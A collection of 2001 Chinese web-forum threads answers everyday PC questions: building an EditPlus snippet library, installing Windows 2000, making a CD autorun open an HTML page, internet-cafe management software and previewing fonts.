选择Add 则可以直接在editplus添加列表项. 其中Title段写入这段代码在列表中要显示的名称 Text body 段写入要插入的代码(如图7)

写完后点ok~ 好了你的内容就增加进去了~(如图8)

自己慢慢收集代码去吧~有好的就拿出来让大家分享你的代码库吧~ :0

经典这方面的资料挺多的~有时间大家整理一下 做个ctl文件共享岂不是很好~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-11-15 12:48:08 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
好东西，好主意~~~
也可以做个DW的资料库啊~~~

[这消息被POPOEVER编辑过(编辑时间2001-11-15 12:49:23)]

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-15 21:38:23 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
POPOEVER在上个帖子中说
引用:
好东西，好主意~~~
也可以做个DW的资料库啊~~~

不管用什么做 最好真的能大家分一下类去做那样不需要多少时间的

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

mmkk

我是谁
积分：7953
发帖：2352
来自：FJ,China
注册：2001-04-04
 发表于 2001-11-15 21:55:57 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP
好东西！自从popo推荐以后我一直用editplus，有时间一定要来做这个，我现在赶公司的内部BBS啊

本头像由诺婷提供^^！

高兴就好

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-16 09:49:56 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
累不累啊，用网海拾贝多方便啊，还可以直接保存网页呢

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
mmkk

我是谁
积分：7953
发帖：2352
来自：FJ,China
注册：2001-04-04
 发表于 2001-11-16 11:22:33 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP
如果你一直用ep，你就不会这样说了！

本头像由诺婷提供^^！

高兴就好

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-16 12:53:23 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
mmkk在上个帖子中说
引用:
如果你一直用ep，你就不会这样说了！

在一个月以前，我还一直用ep，后来才用homesite，ep用来编代码是很不错，但用来保存资料，就不是专业工具了，用过网海拾贝，你不会用ep来保存资料了，拾贝可以直接从网页中获得资料（文字、图片、网页源代码，甚至整个网页）保存到它自已的数据库中，可以方便的全文搜索，这些ep就难了。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-16 13:01:16 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
我喜欢干净 简洁 不喜欢那种类似文字资料似的保存方式~通过检索出结果 那样的话用delphi写个小程序就能做到了~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-16 13:08:26 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
如要收集一些PS的技巧，带图片说明的，就只能抓取网页了。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
mmkk

我是谁
积分：7953
发帖：2352
来自：FJ,China
注册：2001-04-04
 发表于 2001-11-16 20:09:46 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP
因为不管是什么程序我都用EP，所有我觉得把一些技巧之类的东西做在里面相当好，直接双击就可以用了，而没有必要再打开另一个软件，当然也许是个人爱好吧就像你喜欢用网海拾贝一样

本头像由诺婷提供^^！

高兴就好

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-16 21:59:35 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
mmkk在上个帖子中说
引用:
因为不管是什么程序我都用EP，所有我觉得把一些技巧之类的东西做在里面相当好，直接双击就可以用了，而没有必要再打开另一个软件，当然也许是个人爱好吧就像你喜欢用网海拾贝一样

同意~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：用editplus自己动手做资料扩展库
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2000怎么装

计算机技术
win2000怎么装

上一贴 | 下一贴
发表人 主题: win2000怎么装
sgilb

高级用户
积分：187
发帖：76
来自：
注册：2001-09-16
 发表于 2001-11-13 19:50:51 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP
在保留d盘资料的情况下,format c盘,然后用启动盘启动,安装2000
是不是这样,如果是的话,win98做的启动盘可以吗?呵呵,我是菜鸟
如果不是,那该怎么装2000?请一步步详细说一下(从删98开始),谢谢高手.
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-13 20:11:51 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
用的什么版的2K是不是光盘版的，就是那种一张盘的，如果是的话，2K可以光盘引导，在BIOS里设置，建议将C：格成NTFS，至于安装，没什么，都是中文

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

desoso

初级用户
积分：10
发帖：38
来自：最激天使联盟
注册：2001-10-09
 发表于 2001-11-13 20:19:18 按此观看desoso的个人资料 按此发邮件给desoso 发送悄悄话给desoso 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看desoso的IP
用軟磁碟引導計算機正常啓動（需要CDROM）支持模式。
安裝windows95或98。（windows 2000不支持dos模式下的安裝）
完成後繼續裝windows 2000。
建議安裝升級模式，NTFS磁碟格式或者FAT32格式都可以，但是如果把磁碟格式轉換為NTFS，下次想格式化c驅動器就不能用format命令了。
over!

這就是生活
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-13 20:28:46 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
楼上的，为什么不行，我装2K都是在DOS下装的，光盘引导的，NO PROBLEM！
转NTFS，还是PQMAGIC好！

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-14 11:21:46 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
用98的启动盘引导，找到光驱，进入一个I386的子目录，执行WINNT，就开始安装了，推荐安装完了做一份安装启动盘（预备系统崩溃修复用），具体做发是在I386子目录下有个BOOTDISK目录，在2000的情况下执行makebt32.EXE ,在DOS的情况下执行MAKEBOOT.EXE，需要4张软盘

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-14 21:36:46 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
先进入DOS后 format C:盘
然后BIOS改为光盘引导,把Win2000盘放入,然后安装就可以了.
当安装后重新启动时在把BIOS改为默认引导就可以了

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
sgilb

高级用户
积分：187
发帖：76
来自：
注册：2001-09-16
 发表于 2001-11-14 22:18:11 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP
喝喝,谢谢大家了,看来不懂点硬件知识还真是不行,喝喝~~
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-15 17:24:56 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
sgilb在上个帖子中说
引用:
喝喝,谢谢大家了,看来不懂点硬件知识还真是不行,喝喝~~

我怎么觉得这些是软件知识？呵呵

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-11-15 17:55:09 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
在安装前最好运行下 smartdrv.exe 速度会快很多

好好学习，努力做事
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-15 18:20:28 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
faint，我的WIN2000是在WIN98上面装的。。。什么都不用，塞进光碟，自动运行，setup，搞定。之后再转ntfs的。。。。

好久之前的事了，怎么这么多人现在才装2000？？俺都叉劈了。。。。

always ran...
上一贴 | 下一贴
快速回复 | 主题：win2000怎么装
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有没可能把一个index.htm文件刻在光盘上....

计算机技术
有没可能把一个index.htm文件刻在光盘上....

上一贴 | 下一贴
发表人 | 主题: 有没可能把一个index.htm文件刻在光盘上....
一二三 终级用户 积分：1011 发帖：366 来自： 注册：2000-09-06 | 发表于 2001-11-15 09:24:49 按此观看一二三的个人资料 按此发邮件给一二三 收藏该主题供以后查看 发送悄悄话给一二三 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看一二三的IP 然后,把光盘放入光驱, 自动运行打开index.htm? 谢谢
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-15 09:28:26 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 用做自运行的软件做自运行程序 默认加载后打开index.htm页面就行~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
flyingbird 想飞的心 积分：4546 发帖：1672 来自： 注册：1999-12-22 | 发表于 2001-11-15 09:29:11 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP 答案是不行。 autorun这个功能只对PC机的EXE文件有效。 但是你可以制作一个可执行文件(*.exe)用它来调用index.htm 在autorun.inf里指向这*.exe文件就行了。 行者无疆 Blueidea Web Team Team member
一二三 终级用户 积分：1011 发帖：366 来自： 注册：2000-09-06 | 发表于 2001-11-15 09:29:40 按此观看一二三的个人资料 按此发邮件给一二三 发送悄悄话给一二三 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看一二三的IP 怎么做呀? 谢谢
cqarlene 高级用户 积分：271 发帖：119 来自：成都 注册：2000-11-12 | 发表于 2001-11-15 09:38:16 按此观看cqarlene的个人资料 按此发邮件给cqarlene 访问cqarlene的主页 cqarlene 的 oicq 是7626288,查看 7626288 的资料 发送悄悄话给cqarlene 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cqarlene的IP 刻录软件里有设置，仔细看看，反正我是忘了 ☆° ．★·°∴°★．°·∴°☆ ·°∴° ☆．．·°∴°．☆°★°∴°°∴ ☆°．·★°∴°．
小诺 替补版主 积分：6499 发帖：3746 来自：Shanghai 注册：2000-09-16 | 发表于 2001-11-15 09:47:26 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP http://www.datatrans.com.cn/openhtml.htm
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-15 09:56:33 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 要让光盘置入光驱后即自动运行它的某个EXE文件，必须具备两个条件： 其一，“自动插入通告”是预先打开的。方法是：打开“控制面板”里的“系统”，选择“设备管理器”标签，展开“CDROM”项，右击所要设置的光驱，再选择“属性”，打开“设置”标签，单击“自动插入通告”项目前的方框，并使其内出现“√”。 其二，光盘上要有autorun.inf文件。这是个文本文件，可用记事本等直接编写，其内容主要包括“open=要自动运行的光盘上的EXE文件名”这一行）。 根据这个办法可以通过一个start.exe程序来做到~ 将start.exe程序放在要打开的文件的地同一目录中start.exe程序将打开该文件所在目录下的index.htm文件，如果没有index.htm文件，就打开它本身内置的说明书。 先做autorun.inf文件，内容如下： [AutoRun] Open=Start.exe 将此文件连同网站文件统统刻到盘上，网站首页文件应为index.htm，当然还不能忘记刻进上面的Start.exe ok~行了~ 这里下载start.exe程序 [这消息被yunbin编辑过(编辑时间2001-11-15 09:56:31)] A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
myhyli 现任版主 积分：20379 发帖：4790 来自： 注册：2000-07-22 | 发表于 2001-11-15 10:05:14 按此观看myhyli的个人资料 按此发邮件给myhyli 发送悄悄话给myhyli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看myhyli的IP 用一个编译好的flash文件来打开一个htm页面不就得了 Myhyli www.blueidea.com/user/myhyli Blueidea Web Team Moderator Of Dreamweaver & Javascript
一二三 终级用户 积分：1011 发帖：366 来自： 注册：2000-09-06 | 发表于 2001-11-15 10:28:01 按此观看一二三的个人资料 按此发邮件给一二三 发送悄悄话给一二三 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看一二三的IP 谢谢各位了.
上一贴 | 下一贴
快速回复 | 主题：有没可能把一个index.htm文件刻在光盘上....
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问两个基本问题：

计算机技术
请问两个基本问题：

上一贴 | 下一贴
发表人 | 主题: 请问两个基本问题：
cymkathy 初级用户 积分：0 发帖：1 来自： 注册：2001-11-08 | 发表于 2001-11-12 12:02:07 按此观看cymkathy的个人资料 按此发邮件给cymkathy 收藏该主题供以后查看 发送悄悄话给cymkathy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cymkathy的IP 请问两个基本问题： (1).怎么编辑Autoexec.bat批处理文件？ (2).windows优化大师有使桌面图标变透明的功能，为什么重启机器失效？(winopti已注册)
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2001-11-12 13:50:31 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 1、用记事本便可以编辑。 2、如果只是想设置背景透明，你可以试试这个，挺好用： TransDesktop 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
上一贴 | 下一贴
快速回复 | 主题：请问两个基本问题：
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一网吧?

计算机技术
一网吧?

上一贴 | 下一贴
发表人 主题: 一网吧?
luckboy1017

初级用户
积分：20
发帖：8
来自：
注册：2001-11-08
 发表于 2001-11-09 19:27:49 按此观看luckboy1017的个人资料 按此发邮件给luckboy1017 收藏该主题供以后查看 发送悄悄话给luckboy1017 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看luckboy1017的IP
一网吧：一个服务器，8个无盘工作站（3个硬盘），想在启动时有进入WIN9X或DOS 选项，之后有DOS 和WIN98两类游戏，同是对WIN98要有可靠的管理成序和软件，最 好可 以屏蔽一些功，像兔子类的软件。
请讨论
草原风

初级用户
积分：123
发帖：54
来自：
注册：2001-08-27
 发表于 2001-11-09 22:00:08 按此观看草原风的个人资料 按此发邮件给草原风 访问草原风的主页 草原风 的 oicq 是77704582,查看 77704582 的资料 发送悄悄话给草原风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看草原风的IP
美萍吧

[img]http://aougu.com/bbs/upload/forum23_f_40_1007022940.gif[/img]俺要当水区的版主呀，谁来救俺
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-10 09:16:16 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
luckboy1017在上个帖子中说
引用:
一网吧：一个服务器，8个无盘工作站（3个硬盘），想在启动时有进入WIN9X或DOS 选项，之后有DOS 和WIN98两类游戏，同是对WIN98要有可靠的管理成序和软件，最 好可 以屏蔽一些功，像兔子类的软件。
请讨论

修改注册表就好了

^^
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-10 10:58:38 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
美萍和万象都挺不错~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：一网吧?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


！！~~~~急用中~~~~

计算机技术
！！~~~~急用中~~~~

上一贴 | 下一贴
发表人 | 主题: ！！~~~~急用中~~~~
zzz 初级用户 积分：3 发帖：3 来自：北京 注册：2001-11-07 | 发表于 2001-11-10 02:03:38 按此观看zzz的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给zzz 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zzz的IP 请问有没有能截.rm格式的图象的软件！！~~~~急用中~~~~
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-11-10 02:42:06 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP snagit http://soft.jx163.com/ 自己搜索 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：！！~~~~急用中~~~~
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


听说可以在PC上，虚拟安装MacOS，不知道有什么具体的解决

计算机技术
听说可以在PC上，虚拟安装MacOS，不知道有什么具体的解决

上一贴 | 下一贴
发表人 主题: 听说可以在PC上，虚拟安装MacOS，不知道有什么具体的解决
笑看风云

初级用户
积分：34
发帖：14
来自：
注册：2001-11-06
 发表于 2001-11-06 17:11:51 按此观看笑看风云的个人资料 按此发邮件给笑看风云 收藏该主题供以后查看 发送悄悄话给笑看风云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看笑看风云的IP
听说可以在PC上，虚拟安装MacOS，不知道有什么具体的解决之道呢？

李白侠客行，十步杀一人
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-07 08:59:18 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
这个要软件的，现在很多地方都有这种软件下载，不过我推荐你买一本书；名字叫PC/MAC跨平台交流，如果你那没有你就去http://easypcmac.com/这个地址去看看，这是那本书发行的站点！

^^
because

超级用户
积分：441
发帖：332
来自：深圳
注册：2000-12-09
 发表于 2001-11-07 17:37:11 按此观看because的个人资料 按此发邮件给because 访问because的主页 because 的 oicq 是791321,查看 791321 的资料 发送悄悄话给because 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看because的IP
好象上期的电脑报有篇关于这方面的文章介绍来着啊！

努力ING！！！！
Hanson

超级用户
积分：400
发帖：171
来自：动意营造
注册：2000-12-18
 发表于 2001-11-07 22:51:57 按此观看Hanson的个人资料 按此发邮件给Hanson Hanson 的 oicq 是8693565,查看 8693565 的资料 发送悄悄话给Hanson 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Hanson的IP
安装来也没意思，就算你用屁4也保证慢死你。。。

学习就是生活！—Study360.com
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-08 00:17:15 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
Hanson在上个帖子中说
引用:
安装来也没意思，就算你用屁4也保证慢死你。。。

苹果的处理器运行MacOS,还可以.
如果想用一般的PC,还是不要想了.

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
上一贴 | 下一贴
快速回复 | 主题：听说可以在PC上，虚拟安装MacOS，不知道有什么具体的解决
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


对了,安装字体有什么软件可以预览字体吗?

计算机技术
对了,安装字体有什么软件可以预览字体吗?

上一贴 | 下一贴
发表人 主题: 对了,安装字体有什么软件可以预览字体吗?
frankwuhong

终级用户
积分：483
发帖：169
来自：大连
注册：2001-05-19
 发表于 2001-11-05 23:32:17 按此观看frankwuhong的个人资料 按此发邮件给frankwuhong 访问frankwuhong的主页 收藏该主题供以后查看 发送悄悄话给frankwuhong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frankwuhong的IP
由于我的箭头的问题,有人说是用特殊的字体来写的,有各种各样的箭头.我突然想起来,确实有些字体可以出现很多奇怪的符号,可是装字体不知道这个字体是什么样子的,而且通常一个字体都3m左右,十分庞大,有没有什么办法可以先浏览一下字体,觉得那个好就装那个,这多好,acdsee可以,但是我感觉效果不是很好,速度很慢,而且经常出现错误,大家有什么更好的办法?

我总是和孤独的人一起孤独
http://www.lonelycat.tk
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-06 09:26:20 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
coreldraw的安装盘里面有一个叫fontNav的软件就是预览字体的。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-06 11:00:19 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
frankwuhong在上个帖子中说
引用:
由于我的箭头的问题,有人说是用特殊的字体来写的,有各种各样的箭头.我突然想起来,确实有些字体可以出现很多奇怪的符号,可是装字体不知道这个字体是什么样子的,而且通常一个字体都3m左右,十分庞大,有没有什么办法可以先浏览一下字体,觉得那个好就装那个,这多好,acdsee可以,但是我感觉效果不是很好,速度很慢,而且经常出现错误,大家有什么更好的办法?

这里吧~很多都能预览

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

leesan

终级用户
积分：455
发帖：193
来自：
注册：2001-01-12
 发表于 2001-11-06 16:08:00 按此观看leesan的个人资料 按此发邮件给leesan leesan 的 oicq 是1099196,查看 1099196 的资料 发送悄悄话给leesan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看leesan的IP
有专门的字体管理工具，你搜一下
飞扬

逆风飞扬
艺设版主
积分：2527
发帖：2620
来自：经典.北京
注册：2000-11-09
